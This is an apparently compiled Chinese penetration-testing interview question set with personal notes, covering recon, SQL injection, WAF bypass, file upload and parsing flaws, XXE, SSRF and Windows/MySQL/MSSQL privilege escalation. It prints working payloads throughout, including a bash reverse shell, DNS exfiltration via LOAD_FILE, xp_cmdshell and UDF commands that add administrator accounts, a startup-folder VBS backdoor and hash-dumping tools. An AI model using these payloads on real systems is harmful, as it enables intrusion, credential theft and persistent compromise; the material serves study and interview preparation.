一套實用的滲透測試崗位面試題，你會嗎？

1.拿到一個待檢測的站，你覺得應該先做什么？

收集信息

whois、網站源IP、旁站、C段網站、服務器系統版本、容器版本、程序版本、數據庫類型、二級域名、防火墻、維護者信息另說...

2.mysql的網站注入，5.0以上和5.0以下有什么區別？

5.0以下沒有information_schema這個系統表，無法列表名等，只能暴力跑表名。

5.0以下是多用戶單操作，5.0以上是多用戶多操做。

3.在滲透過程中，收集目標站注冊人郵箱對我們有什么價值？

丟社工庫里看看有沒有泄露密碼，然后嘗試用泄露的密碼進行登錄后臺。

用郵箱做關鍵詞進行丟進搜索引擎。

利用搜索到的關聯信息找出其他郵箱進而得到常用社交賬號。

社工找出社交賬號，里面或許會找出管理員設置密碼的習慣 。

利用已有信息生成專用字典。

觀察管理員常逛哪些非大眾性網站，拿下它，你會得到更多好東西。

4.判斷出網站的CMS對滲透有什么意義？

查找網上已曝光的程序漏洞。

如果開源，還能下載相對應的源碼進行代碼審計。

5.一個成熟并且相對安全的CMS，滲透時掃目錄的意義？

敏感文件、二級目錄掃描

站長的誤操作比如：網站備份的壓縮文件、說明.txt、二級目錄可能存放著其他站點

6.常見的網站服務器容器。

IIS、Apache、nginx、Lighttpd、Tomcat

7.mysql注入點，用工具對目標站直接寫入一句話，需要哪些條件？

root權限以及網站的絕對路徑。

1當前用戶有FILE權限1

2知道絕對路徑

3路徑可寫

8.目前已知哪些版本的容器有解析漏洞，具體舉例。

IIS 6.0

/xx.asp/xx.jpg "xx.asp"是文件夾名

IIS 7.0/7.5

默認Fast-CGI開啟，直接在url中圖片地址后面輸入/1.php，會把正常圖片當成php解析

Nginx

版本小于等于0.8.37，利用方法和IIS 7.0/7.5一樣，Fast-CGI關閉情況下也可利用。

空字節代碼 xxx.jpg.php

Apache

上傳的文件命名為：test.php.x1.x2.x3，Apache是從右往左判斷后綴

lighttpd

xx.jpg/xx.php，不全,請小伙伴們在評論處不吝補充，謝謝！

9.如何手工快速判斷目標站是windows還是linux服務器？

linux大小寫敏感,windows大小寫不敏感。

10.為何一個mysql數據庫的站，只有一個80端口開放？

更改了端口，沒有掃描出來。

站庫分離。

3306端口不對外開放

11.3389無法連接的幾種情況。

沒開放3389 端口

端口被修改

防護攔截

處于內網(需進行端口轉發)

12.如何突破注入時字符被轉義？

寬字符注入

hex編碼繞過

13.在某后臺新聞編輯界面看到編輯器，應該先做什么？

查看編輯器的名稱版本,然后搜索公開的漏洞。

14.拿到一個webshell發現網站根目錄下有.htaccess文件，我們能做什么？

能做的事情很多，用隱藏網馬來舉例子：

插入

SetHandler application/x-httpd-php

.jpg文件會被解析成.php文件。

具體其他的事情，不好詳說，建議大家自己去搜索語句來玩玩。

15.注入漏洞只能查賬號密碼？

只要權限廣，拖庫脫到老。

16.安全狗會追蹤變量，從而發現出是一句話木馬嗎？

是根據特征碼，所以很好繞過了，只要思路寬，繞狗繞到歡，但這應該不會是一成不變的。

17.access 掃出后綴為asp的數據庫文件，訪問亂碼。如何實現到本地利用。

迅雷下載，直接改后綴為.mdb。

18.提權時選擇可讀寫目錄，為何盡量不用帶空格的目錄？

因為exp執行多半需要空格界定參數

19.某服務器有站點A,B 為何在A的后臺添加test用戶，訪問B的后臺。發現也添加上了test用戶？

同數據庫。

20.注入時可以不使用and 或or 或xor，直接order by 開始注入嗎？

and/or/xor，前面的1=1、1=2步驟只是為了判斷是否為注入點，如果已經確定是注入點那就可以省那步驟去。

21:某個防注入系統，在注入時會提示：

系統檢測到你有非法注入的行為。

已記錄您的ip xx.xx.xx.xx

時間:2016:01-23

提交頁面:test.asp?id=15

提交內容:and 1=1

如何利用這個防注入系統拿shell？

在URL里面直接提交一句話，這樣網站就把你的一句話也記錄進數據庫文件了 這個時候可以嘗試尋找網站的配置文件 直接上菜刀鏈接。具體文章參見：http://ytxiao.lofter.com/post/40583a_ab36540。

22.上傳大馬后訪問亂碼時，有哪些解決辦法？

瀏覽器中改編碼。

23.審查上傳點的元素有什么意義？

有些站點的上傳文件類型的限制是在前端實現的，這時只要增加上傳類型就能突破限制了。

24.目標站禁止注冊用戶，找回密碼處隨便輸入用戶名提示：“此用戶不存在”，你覺得這里怎樣利用？

先爆破用戶名，再利用被爆破出來的用戶名爆破密碼。

其實有些站點，在登陸處也會這樣提示

所有和數據庫有交互的地方都有可能有注入。

25.目標站發現某txt的下載地址為http://www.test.com/down/down.php?file=/upwdown/1.txt，你有什么思路？

這就是傳說中的下載漏洞！在file=后面嘗試輸入index.php下載他的首頁文件，然后在首頁文件里繼續查找其他網站的配置文件，可以找出網站的數據庫密碼和數據庫的地址。

26.甲給你一個目標站，并且告訴你根目錄下存在/abc/目錄，并且此目錄下存在編輯器和admin目錄。請問你的想法是？

直接在網站二級目錄/abc/下掃描敏感文件及目錄。

27.在有shell的情況下，如何使用xss實現對目標站的長久控制？

后臺登錄處加一段記錄登錄賬號密碼的js，并且判斷是否登錄成功，如果登錄成功，就把賬號密碼記錄到一個生僻的路徑的文件中或者直接發到自己的網站文件中。(此方法適合有價值并且需要深入控制權限的網絡)。

在登錄后才可以訪問的文件中插入XSS腳本。

28.后臺修改管理員密碼處，原密碼顯示為*。你覺得該怎樣實現讀出這個用戶的密碼？

審查元素 把密碼處的password屬性改成text就明文顯示了

29.目標站無防護，上傳圖片可以正常訪問，上傳腳本格式訪問則403.什么原因？

原因很多，有可能web服務器配置把上傳目錄寫死了不執行相應腳本，嘗試改后綴名繞過

30.審查元素得知網站所使用的防護軟件，你覺得怎樣做到的？

在敏感操作被攔截，通過界面信息無法具體判斷是什么防護的時候，F12看HTML體部 比如護衛神就可以在名稱那看到內容。

31.在win2003服務器中建立一個 .zhongzi文件夾用意何為？

隱藏文件夾，為了不讓管理員發現你傳上去的工具。

32、sql注入有以下兩個測試選項，選一個并且闡述不選另一個的理由：

A. demo.jsp?id=2+1?????? B. demo.jsp?id=2-1

選B，在 URL 編碼中 + 代表空格，可能會造成混淆

33、以下鏈接存在 sql 注入漏洞，對于這個變形注入，你有什么思路？

demo.do?DATA=AjAxNg==

DATA有可能經過了 base64 編碼再傳入服務器，所以我們也要對參數進行 base64 編碼才能正確完成測試

34、發現 demo.jsp?uid=110 注入點，你有哪幾種思路獲取 webshell，哪種是優選？

有寫入權限的，構造聯合查詢語句使用using INTO OUTFILE，可以將查詢的輸出重定向到系統的文件中，這樣去寫入 WebShell

使用 sqlmap –os-shell 原理和上面一種相同，來直接獲得一個 Shell，這樣效率更高

通過構造聯合查詢語句得到網站管理員的賬戶和密碼，然后掃后臺登錄后臺，再在后臺通過改包上傳等方法上傳 Shell

35、CSRF 和 XSS 和 XXE 有什么區別，以及修復方式？

XSS是跨站腳本攻擊，用戶提交的數據中可以構造代碼來執行，從而實現竊取用戶信息等攻擊。修復方式：對字符實體進行轉義、使用HTTP Only來禁止JavaScript讀取Cookie值、輸入時校驗、瀏覽器與Web應用端采用相同的字符編碼。

CSRF是跨站請求偽造攻擊，XSS是實現CSRF的諸多手段中的一種，是由于沒有在關鍵操作執行時進行是否由用戶自愿發起的確認。修復方式：篩選出需要防范CSRF的頁面然后嵌入Token、再次輸入密碼、檢驗Referer

XXE是XML外部實體注入攻擊，XML中可以通過調用實體來請求本地或者遠程內容，和遠程文件保護類似，會引發相關安全問題，例如敏感文件讀取。修復方式：XML解析庫在調用時嚴格禁止對外部實體的解析。

36、CSRF、SSRF和重放攻擊有什么區別？

CSRF是跨站請求偽造攻擊，由客戶端發起

SSRF是服務器端請求偽造，由服務器發起

重放攻擊是將截獲的數據包進行重放，達到身份認證等目的

37、說出至少三種業務邏輯漏洞，以及修復方式？

密碼找回漏洞中存在密碼允許暴力破解、存在通用型找回憑證、可以跳過驗證步驟、找回憑證可以攔包獲取等方式來通過廠商提供的密碼找回功能來得到密碼

身份認證漏洞中最常見的是會話固定攻擊和 Cookie 仿冒，只要得到 Session 或 Cookie 即可偽造用戶身份

驗證碼漏洞中存在驗證碼允許暴力破解、驗證碼可以通過 Javascript 或者改包的方法來進行繞過

38、圈出下面會話中可能存在問題的項，并標注可能會存在的問題？

get /ecskins/demo.jsp?uid=2016031900&keyword=”hello world”

HTTP/1.1Host:*******.com:82User-Agent:Mozilla/

5.0 Firefox/40Accept:text/css,*/*;q=0.1

Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3

Referer:http://*******.com/eciop/orderForCC/

cgtListForCC.htm?zone=11370601&v=145902

Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;

uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;

st_uid=N90PLYHLZGJXI-NX01VPUF46W;

status=True

Connection:keep-alive

39、找一類你最擅長的漏洞，談下繞過漏洞修復后的方案？

40、你常用的滲透工具有哪些，最常用的是哪個？

41、描述一個你深入研究過的 CVE 或 POC。

42、談談你經常關注的安全平臺？

私人面試總結內容

1，做一下簡單的自我介紹，經歷，工作經驗，愛好，自己總結。

面試題：

一，給你一個網站你是如何來滲透測試的?

在獲取書面授權的前提下。

1)信息收集，

1，獲取域名的whois信息,獲取注冊者郵箱姓名電話等。

2，查詢服務器旁站以及子域名站點，因為主站一般比較難，所以先看看旁站有沒有通用性的cms或者其他漏洞。

3，查看服務器操作系統版本，web中間件，看看是否存在已知的漏洞，比如IIS，APACHE,NGINX的解析漏洞

4，查看IP，進行IP地址端口掃描，對響應的端口進行漏洞探測，比如 rsync,心臟出血，mysql,ftp,ssh弱口令等。

5，掃描網站目錄結構，看看是否可以遍歷目錄，或者敏感文件泄漏，比如php探針

6，google hack 進一步探測網站的信息，后臺，敏感文件

2）漏洞掃描

開始檢測漏洞，如XSS,XSRF,sql注入，代碼執行，命令執行，越權訪問，目錄讀取，任意文件讀取，下載，文件包含，

遠程命令執行，弱口令，上傳，編輯器漏洞，暴力破解等

3）漏洞利用

利用以上的方式拿到webshell，或者其他權限

4）權限提升

提權服務器，比如windows下mysql的udf提權，serv-u提權，windows低版本的漏洞，如iis6,pr,巴西烤肉，

linux藏牛漏洞，linux內核版本漏洞提權，linux下的mysql system提權以及oracle低權限提權

5) 日志清理

6）總結報告及修復方案

一，sqlmap，怎么對一個注入點注入？

1）如果是get型號，直接，sqlmap -u "諸如點網址".

2) 如果是post型諸如點，可以sqlmap -u "注入點網址” --data="post的參數"

3）如果是cookie，X-Forwarded-For等，可以訪問的時候，用burpsuite抓包，注入處用*號替換，放到文件里，然后sqlmap -r "文件地址"

二，nmap，掃描的幾種方式

三，sql注入的幾種類型？

1）報錯注入

2）bool型注入

3）延時注入

4）寬字節注入

四，報錯注入的函數有哪些？ 10個

1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------

2）通過floor報錯 向下取整

3）+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4）.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5）.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6）.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7）.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8）.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9）.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10）.exp()select * from test where id=1 and exp(~(select * from(select user())a));

五，延時注入如何來判斷？

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

六，盲注和延時注入的共同點？

都是一個字符一個字符的判斷

七，如何拿一個網站的webshell？

上傳，后臺編輯模板，sql注入寫文件，命令執行，代碼執行，

一些已經爆出的cms漏洞，比如dedecms后臺可以直接建立腳本文件，wordpress上傳插件包含腳本文件zip壓縮包等

八，sql注入寫文件都有哪些函數？

select '一句話' into outfile '路徑'

select '一句話' into dumpfile '路徑'

select '' into dumpfile??'d:\\wwwroot\baidu.com\nvhack.php';

九，如何防止CSRF?

1,驗證referer

2，驗證token

詳細：http://cnodejs.org/topic/5533dd6e9138f09b629674fd

十，owasp 漏洞都有哪些？

1、SQL注入防護方法：

2、失效的身份認證和會話管理

3、跨站腳本攻擊XSS

4、直接引用不安全的對象

5、安全配置錯誤

6、敏感信息泄露

7、缺少功能級的訪問控制

8、跨站請求偽造CSRF

9、使用含有已知漏洞的組件

10、未驗證的重定向和轉發

十一：SQL注入防護方法？

1、使用安全的API

2、對輸入的特殊字符進行Escape轉義處理

3、使用白名單來規范化輸入驗證方法

4、對客戶端輸入進行控制，不允許輸入SQL注入相關的特殊字符

5、服務器端在提交數據庫進行SQL查詢之前，對特殊字符進行過濾、轉義、替換、刪除。

十二，代碼執行，文件讀取，命令執行的函數都有哪些？

1，代碼執行：eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

2，文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

3，命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

十三，img標簽除了onerror屬性外，還有其他獲取管理員路徑的辦法嗎？

src指定一個遠程的腳本文件，獲取referer

十四，img標簽除了onerror屬性外，并且src屬性的后綴名，必須以.jpg結尾，怎么獲取管理員路徑。

1,遠程服務器修改apache配置文件，配置.jpg文件以php方式來解析

AddType application/x-httpd-php .jpg

會以php方式來解析

******【【【【【【【代碼審計】】】---

eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function

文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等

命令執行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

******【【【【【【【繞過walf】】】----------------------------------------------------------------

1、關鍵字可以用%（只限IIS系列）。比如select，可以sel%e%ct。原理：網絡層waf對SEL%E%CT進行url解碼后變成SEL%E%CT，匹配select失敗，而進入asp.dll對SEL%E%CT進行url解碼卻變成select。IIS下的asp.dll文件在對asp文件后參數串進行url解碼時，會直接過濾掉09-0d（09是tab鍵,0d是回車）、20（空格）、%(后兩個字符有一個不是十六進制)字符。xss也是同理。

2、通殺的，內聯注釋。安全狗不攔截，但是安全寶、加速樂、D盾等，看到/*!/就Fack了，所以只限于安全狗。比如：/*!select*/

3、編碼。這個方法對waf很有效果，因為一般waf會解碼，但是我們利用這個特點，進行兩次編碼，他解了第一次但不會解第二次，就bypass了。騰訊waf、百度waf等等都可以這樣bypass的。

4，繞過策略一：偽造搜索引擎

早些版本的安全狗是有這個漏洞的，就是把User-Agent修改為搜索引擎

5，360webscan腳本存在這個問題，就是判斷是否為admin dede install等目錄，如果是則不做攔截

1.???? GET /pen/news.php?id=1 union select user,password from mysql.user

1.???? GET /pen/news.php/admin?id=1 union select user,password from mysql.user

1.???? GET /pen/admin/..\news.php?id=1 union select user,password from mysql.user

6，multipart請求繞過，在POST請求中添加一個上傳文件，繞過了絕大多數WAF。

7，參數繞過，復制參數，id=1&id=1

用一些特殊字符代替空格，比如在mysql中%0a是換行，可以代替空格，這個方法也可以部分繞過最新版本的安全狗，在sqlserver中可以用/**/代替空格

8,內聯注釋，

文件上傳，復制文件包一份再加一份

在 form-data;后面增加一定的字符

360面試指南

******【【【【【【【【寬字符注入】】】--------------------------------------------------------------

寬字符：解 決方法：就是在初始化連接和字符集之后，使用SET character_set_client=binary來設定客戶端的字符集是二進制的。修改Windows下的MySQL配置文件一般是 my.ini，Linux下的MySQL配置文件一般是my.cnf，比如：mysql_query("SETcharacter_set_client=binary");。character_set_client指定的是SQL語句的編碼，如果設置為 binary，MySQL就以二進制來執行，這樣寬字節編碼問題就沒有用武之地了。

http://wenku.baidu.com/link?url=F4Cq18NYdsnATq3eqtr3zCWLKExoEYV62yJp5zsfM5c85iv4rldTvl1A_SGilEAiWB_O_hg0C9A8VLoIT4K_HxyyF0Z7xo5Pihh1VxxYa4QGiXQ_wGDjiOFHubYvshgl

******【【【【【【【oracle注入】】】--------------------------------------------------------------

【漏洞名稱】 sys.dbms_export_extension.get_domain_index_metadata 提升權限漏洞

【影響平臺】Oracle 8i / 9i / 10g / XE

【風險等級】高【攻擊需求】較低權限賬號

【造成危害】取得管理員權限

******mysql4和mysql5的區別---------------------------------------------------

mysql 5.0,增加了infomaction數據庫，存儲過程，視圖，

******xss 掛馬，ddos攻擊，csrf--------

htmlspecialchars將與、單雙引號、大于和小于號化成HTML格式

htmlentities() 所有字符都轉成實體，strip_tags 去掉HTML和php標記

http://www.cnblogs.com/siqi/p/4117421.html

******【【【【【【【mssql提權】】】---------------------------------------------------------------

首先看看xp_cmdshell存在不,不存在的話先恢復下。

Exec sp_configure show advanced options,1;RECONFIGURE;EXEC sp_configure xp_cmdshell,1;RECONFIGURE;

;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;--

如果cmdshell還不行的話，就再運行：;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--

或者;sp_addextendedproc xp_cmdshell,@dllname=xplog70.dll來恢復cmdshell。

3 無法在庫 xpweb70.dll 中找到函數 xp_cmdshell。原因: 127(找不到指定的程序。)

恢復方法：查詢分離器連接后,

第一步執行:exec sp_dropextendedproc xp_cmdshell

第二步執行:exec sp_addextendedproc xp_cmdshell,xpweb70.dll

然后按F5鍵命令執行完畢

四.終極方法.

如果以上方法均不可恢復,請嘗試用下面的辦法直接添加帳戶:

查詢分離器連接后,

2000servser系統:

declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net user dell huxifeng007 /add

declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:winntsystem32cmd.exe /c net localgroup administrators dell /add

sql2008 提權 低權限運行

******【【【【【【【mssql提權錯誤5 cmd權限不足】】】-------------------------------------

錯誤代碼”5″，馬上google之。由于xp_cmdshell是嚴格用%systemroot%\system32\cmd.exe去執行所提交的命令的，提示”5″，意思是cmd的權限不足，就是說system32下的cmd.exe被降權了。當然也有繞過的方法，比如啟用沙盒模式執行shell命令：

*******【【【【【【【mssql2008 sqlmap ,提權成功】】】---------------------------------

http://www.freebuf.com/articles/web/10280.html

2008sa權限，用sqlmap提權成功。

第一種函數

select name from sysobjects where xtype=u??通過這個來爆第一個表

select name from sysobjects where xtype=u and name not in(爆出來的表1，爆出來的表2...)

一直爆下去，直到找到我們所需要的表位置

第二種函數

select table_name from information_schema.tables

select table_name from information_schema.tables where table_name not in (爆出來的表1，爆出來的表2...)。

******【【【【【【【XXE漏洞】】】--------------------------------------------

引用外部實體????

或者????????????

當允許引用外部實體時，通過構造惡意內容，

1可導致讀取任意文件、2執行系統命令、3探測內網端口、4攻擊內網網站等危害。

對于不同XML解析器,對外部實體有不同處理規則,在PHP中默認處理的函數為: xml_parse和simplexml_load xml_parse的實現方式為expat庫，默認情況不會解析外部實體,而simplexml_load默認情況下會解析外部實體,造成安全威脅.除PHP外，在Java，Python等處理xml的組件及函數中都可能存在此問題

https://www.waitalone.cn/xxe-attack.html

XXE漏洞 http://www.91ri.org/9539.html

[

0x04 防御

方案一、使用開發語言提供的禁用外部實體的方法

libxml_disable_entity_loader(true);

方案二、過濾用戶提交的XML數據

1.檢查所使用的底層xml解析庫，默認禁止外部實體的解析

2.使用第三方應用代碼及時升級補丁

3.同時增強對系統的監控，防止此問題被人利用

對于PHP,由于simplexml_load_string函數的XML解析問題出在libxml庫上,所以加載實體前可以調用這樣一個函數

借助XXE,攻擊者可以實現任意文件讀取,DOS拒絕服務攻擊以及代理掃描內網等.

-------------------------------------

gpc 魔術引號 on http://www.jb51.net/article/38990

.htm

------------------------------

******【【【【【【【MYSQL提權】】】------------------------------

一 UDF提權

這類提權方法我想大家已經知道了，我大致寫一下，具體語句如下：

create function cmdshell returns string soname ’udf.dll’

select cmdshell(’net user iis_user 123!@#abcABC /add’);

select cmdshell(’net localgroup administrators iis_user /add’);

select cmdshell(’regedit /s d:web3389.reg’);

drop function cmdshell;

select cmdshell(’netstat -an’);

二 VBS啟動項提權

create table a (cmd text);

insert into a values ("set wshshell=createobject (""wscript.shell"") " );

insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC/add"",0) " );

insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );

select * from a into outfile "C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\a.vbs";

三 Linx MySQL BackDoor提權

Linx Mysql Door

Mysql BackDoor是一款針對PHP+Mysql服務器開發的后門,該后門安裝后為Mysql增加一個可以執行系統命令的"state"函數,并且隨Mysql進程啟動一個基于Dll的嗅探型后門,這個后門在Windows下擁有與Mysql一樣的系統權限,從而巧妙的實現了無端口,無進程,無服務的穿墻木馬.

用法：將Mysql.php傳到PHP服務器上,點擊"自動安裝Mysql BackDoor"，然后直接執行命令即可

四，MIX.DLL提權

http://www.freebuf.com/vuls/85021.html

1，在獨立IP的sqlmap下運

2，禁用本地緩存 net stop dns

3，http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT hex(user())),'.abc.com\\foobar'))),1,1)%23

http://localhost/inject.php?user=123' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT concat(user,'_',mid(password,2,41)) from user where user='root' limit 1),'.md5crack.cn\\foobar'))),1,1)%23

https://sanwen8.cn/p/1acWt8J.html?? DNS突破

******【【【【【【【SSRF】】】----------------------------------------------------

SSRF(Server-Side Request Forgery:服務器端請求偽造) 是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞。一般情況下，SSRF攻擊的目標是從外網無法訪問的內部系統

***--------------------------

SSRF統一錯誤信息，避免用戶可以根據錯誤信息來判斷遠程服務器端口狀態

2.限制請求的端口為HTTP常用的端口，比如 80,443,8080,8088等

3.黑名單內網IP。

4.禁用不需要的協議，僅僅允許HTTP和HTTPS.

******【【【【【【【PHP命令執行】】】-----------------------------------------------------

system,exec,shell_exec,paassthru,popen,proc_popen,

反彈shell?? 公網服務器執行 nc –lvv 8888

目標服務器上執行?cmd= bash -i >& /dev/tcp/10.0.0.1/8888 0>&1

并在disabl_functions中禁用

******【【【【【【【任意文件下載，限制php.ini open_basedir 限定文件的訪問范】】】

******【【【【【【【文件包含漏洞】】】-----------------------------

? 配合文件上傳漏洞GetShell? 可以執行任意腳本代碼 ? 網站源碼文件以及配置文件泄露? 遠程包含GetShell? 控制整個網站甚至是服務器

allow_url_fopen和allow_url_include為ON的話，則包含的文件可以是第三方服務器中的文件，這樣就形成了遠程文件包含漏洞

/etc/passwd ? 需要 magic_quotes_gpc=off,PHP小于5.3.4有效

? /etc/passwd././././././././././././.[......]/././././././././.

? php版本小于5.2.8可以成功，linux需要文件名長于4096，windows需要長于256

index.php?page=php://filter/read/=convert.base64-encode/resource=index.php

******【【【【【【【文件上傳，js檢測，MIME類型檢測Content-Type,文件內容，服務端目】】】錄-------------------------------------------------------------

通過抓包截斷將 eval.php.jpg 換成 eval.php_jpg(下劃線為0x00)。在上

傳文件時系統文件遇到0x00。會認為文件已經結束。從而將eval.php.jpg的內

容寫入到eval.php中。

。htaccess文件內容

SetHandler application/x-httpd-php

文件幻數檢測 jpg(JFIF) gif(GIF89a) png(%PNG)

apache解析漏洞，2.0-2.2 IIS7.5解析漏洞，任意文件名后加.php

nginx<0.8.32 1.jpg/1.php

nginx>0.8.41<1.5.6,1.jpg%20.php解析

******【【【【【【【and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】----------------

1、通過floor報錯 向下取整

+and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

4.geometrycollection()select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()select * from test where id=1 and exp(~(select * from(select user())a));

if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)

addslashes() 函數返回在預定義字符之前添加反斜杠的字符串

******SQL注入（Sql Injection ）是一種將SQL語句插入或添加到應用(用戶)的輸入

參數中的攻擊，之后再將這些參數傳遞給后臺的SQL服務器加以解析并執行。----------------------

******【【【【【【【HTTP協議head 這個方法的功能與get方法相似，】】】不同之處在于HEAD。這個方法的功能與GET方法相似，不同之處在

于服務器不會在其相應中返回消息主體。

? TRACE。這種方法主要用于診斷。

? OPTIONS。這種方法要求服務器報告對某一特殊資源有效的HTTP方法。

? PUT。這個方法試圖使用包含在請求主體中的內容，向服務器上傳制定的資源

****** 各種注釋#-- -- - --+ // /**/ 空白字符，+號，-號，～號，！號，@形式{} %0a-----------------------------

------------------------------------------------------

域和組的區別編輯

工作組是一群計算機的集合，它僅僅是一個邏輯的集合，各自計算機還是各自管理的，你要訪問其中的計算機，還是要到被訪問計算機上來實現用戶驗證的。而域不同，域是一個有安全邊界的計算機集合，在同一個域中的計算機彼此之間已經建立了信任關系，在域內訪問其他機器，不再需要被訪問機器的許可了。為什么是這樣的呢？因為在加入域的時候，管理員為每個計算機在域中（可和用戶不在同一域中）建立了一個計算機帳戶，這個帳戶和用戶帳戶一樣，也有密碼保護的。可是大家要問了，我沒有輸入過什么密碼啊，是的，你確實沒有輸入，計算機帳戶的密碼不叫密碼，在域中稱為登錄憑據，它是由2000的DC（域控制器）上的KDC服務來頒發和維護的。為了保證系統的安全，KDC服務每30天會自動更新一次所有的憑據，并把上次使用的憑據記錄下來。周而復始。也就是說服務器始終保存著2個憑據，其有效時間是60天，60天后，上次使用的憑據就會被系統丟棄。如果你的GHOST備份里帶有的憑據是60天的，那么該計算機將不能被KDC服務驗證，從而系統將禁止在這個計算機上的任何訪問請求（包括登錄），解決的方法呢，簡單的方法使將計算機脫離域并重新加入，KDC服務會重新設置這一憑據。或者使用2000資源包里的NETDOM命令強制重新設置安全憑據。因此在有域的環境下，請盡量不要在計算機加入域后使用GHOST備份系統分區，如果作了，請在恢復時確認備份是在60天內作的，如果超出，就最好聯系你的系統管理員，你可以需要管理員重新設置計算機安全憑據，否則你將不能登錄域環境。

域和工作組適用的環境不同，域一般是用在比較大的網絡里，工作組則較小，在一個域中需要一臺類似服務器的計算機，叫域控服務器，其他電腦如果想互相訪問首先都是經過它的，但是工作組則不同，在一個工作組里的所有計算機都是對等的，也就是沒有服務器和客戶機之分的，但是和域一樣，如果一臺計算機想訪問其他計算機的話首先也要找到這個組中的一臺類似組控服務器，組控服務器不是固定的，以選舉的方式實現，它存儲著這個組的相關信息，找到這臺計算機后得到組的信息然后訪問。

******【【【【【【【提權】】】---------------------------------------------

systeminfo 查看修補補訂

systeminfo

查看未修補的補丁編號

KB952004 MS09-012????????PR????-pr.exe

KB956572 MS09-012????????巴西烤肉

KB970483 MS09-020????????IIS6溢出???? -iis6.exe

LPK劫持???? -lpk.dll

windows 2003>>

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3057191

KB2840221 KB3000061 KB2850851 KB2711167 KB2360937

KB2478960 KB2507938 KB2566454 KB2646524 KB2645640

KB2641653 KB944653 KB952004 KB971657 KB2620712

KB2393802 KB942831 KB2503665 KB2592799 KB956572

KB977165 KB2621440) do @type C:\Windows\Temp\temp.txt|

@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows

\Temp\temp.txt

通用型>>

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280

KB3143141 KB3134228 KB3079904 KB3077657 KB3124280

KB3045171 KB2829361 KB3000061 KB2850851 KB2707511

KB970483 KB2124261 KB2271195) do @type C:\Windows

\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /

q /a C:\Windows\Temp\temp.txt

接下來 可以

修改管理員密碼

創建一個新用戶 添加到管理員組

提取當前登錄用戶密碼??（Getpass.exe）

修改幫助賬號（SUPPOTR_338945a0）的密碼，并添加管理員組 (比較不容易被發現，推薦使用)

提取用戶密碼哈希值（wce.exe）

linux 臟牛漏洞，系統自身漏洞

ftp-serv-u

mof mysql提權

administrator以上權限

當前管理員沒有注銷登錄（query user 命令查看）

工具： mimkatz

getpass

工具：-------------到處hash

wce

gethash

hashdump

SAMInside讀取系統用戶密碼 administrator

Pwdump7這個工具是一個命令行工具Win7下測試直接是空白輸出，在2003下能出來hash如果使用腳本來破解的話，那樣的話會打開兩個在線破解hash的網站，同時打開導出的結果

可運用的sql函數&關鍵字：

MySQL：

union distinct

union distinctrow

procedure analyse()

updatexml()

extracavalue()

exp()

ceil()

atan()

sqrt()

floor()

ceiling()

tan()

rand()

sign()

greatest()

字符串截取函數

Mid(version(),1,1)

Substr(version(),1,1)

Substring(version(),1,1)

Lpad(version(),1,1)

Rpad(version(),1,1)

Left(version(),1)

reverse(right(reverse(version()),1)

字符串連接函數

concat(version(),'|',user());

concat_ws('|',1,2,3)

字符轉換

Char(49)

Hex('a')

Unhex(61)

過濾了逗號

(1)limit處的逗號：

limit 1 offset 0

(2)字符串截取處的逗號

mid處的逗號：

mid(version() from 1 for 1)

MSSQL：

IS_SRVROLEMEMBER()

IS_MEMBER()

HAS_DBACCESS()

convert()

col_name()

object_id()

is_srvrolemember()

is_member()

字符串截取函數

Substring(@@version,1,1)

Left(@@version,1)

Right(@@version,1)

(2)字符串轉換函數

Ascii('a') 這里的函數可以在括號之間添加空格的，一些waf過濾不嚴會導致bypass

Char('97')

exec